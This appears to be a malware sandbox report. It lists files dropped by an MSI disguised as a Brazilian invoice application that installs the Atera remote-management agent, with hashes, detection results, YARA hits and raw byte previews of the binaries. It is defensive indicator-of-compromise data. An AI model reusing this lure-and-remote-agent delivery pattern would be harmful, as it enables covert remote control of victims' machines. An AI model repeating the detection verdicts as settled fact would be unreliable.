                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              692c4c.rbf (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                                                                              692c4d.rbf (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              692c4e.rbf (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                                                                              C:\Config.Msi\692c42.rbs

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8853
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.668195954464292
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:4jexz1ccbTOOeMeYu61Q7r6IHfQ7r6kAVv70HVotBVeZEmzmYpLAV77kXpY92r:4yD2M0p0tiB2iQ
                                                                                                                                                                                                                                                                                              MD5:63FA79924E430C38330CDD2DFF90F10F
                                                                                                                                                                                                                                                                                              SHA1:6784C54E39C954F5E5562816E4E9868822F9C619
                                                                                                                                                                                                                                                                                              SHA-256:F43E9DAB9B53637B44023D3BE5E941456FD816DB1CEEEBEC2E4D4BF20CB52407
                                                                                                                                                                                                                                                                                              SHA-512:6B31BB4C68959AD5F14A0DF995925F45DBE852D6DD4A5291AFD5C1EFB22A967BAD4BFBDB46E6B534F0881903421CB47EAAB7E6011B91A65CE8950E2F4B71407B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\692c42.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@C7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@.

                                                                                                                                                                                                                                                                                              C:\Config.Msi\692c47.rbs

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9519
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.57476219348133
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:ojeGQcRRbLCsgRRbLCMDp17qEVl0QRLALtyD0qagukGGhaKfmbHt1fCqk4rEcZ:oyYRlgRld7KKLqlT
                                                                                                                                                                                                                                                                                              MD5:DEFFA740EDF9B1E56FAEBFE6FA07C805
                                                                                                                                                                                                                                                                                              SHA1:5EEBF479685060A1819AA673B35A34683F52E0C1
                                                                                                                                                                                                                                                                                              SHA-256:E975CC608E6B40C7898DD59C74058A8C08DBBBE1A87E59A9CD11E77D46D62631
                                                                                                                                                                                                                                                                                              SHA-512:410E287B8979A79CEE85BD4D6E8E6D829BF71D83F58F03BD5F3657B843A7A934E6195F523E466FB60342AE2FD08A76D4C91947104FB7B4EDB27EA948603E111C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\692c47.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@s7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\692c43.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....%...AuthorizedCDFPrefix%...Comments%...Contact%...DisplayVersion..1.8.7.2

                                                                                                                                                                                                                                                                                              C:\Config.Msi\692c4f.rbs

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8767
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.653216214534311
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:ny7wo+fncHMes1j6ITj6k7s5VNpkxYpLso:nPo+fncHIjVjtSNpkcP
                                                                                                                                                                                                                                                                                              MD5:F0990B56F9DB80DB07CA0AB09F8714EA
                                                                                                                                                                                                                                                                                              SHA1:0025E14A649293A27454DBDE256249EBB367D143
                                                                                                                                                                                                                                                                                              SHA-256:32EF3744EAD9F3BEC84E826978B78E8EC88E0A3AB9C38B4F974873BA12945293
                                                                                                                                                                                                                                                                                              SHA-512:DD060520966EE5E45DCAC3E3323C1AC49BF925AC2EA23959331549B13C6B23E22C994115EACF2FAB07CB82BF766EE23FC01D876F230E92F84F3EB3A0AB4DCBD6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\692c4f.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\692c4f.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@w7&Z.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):753
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                                              MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                                              SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                                              SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                                              SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallState

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7466
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                                              MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                                                                              SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                                              SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                                              SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145968
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                              MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                              SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                              SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1442
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                              MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                              SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                              SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                              SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215088
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                              MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                              SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                              SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                              SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
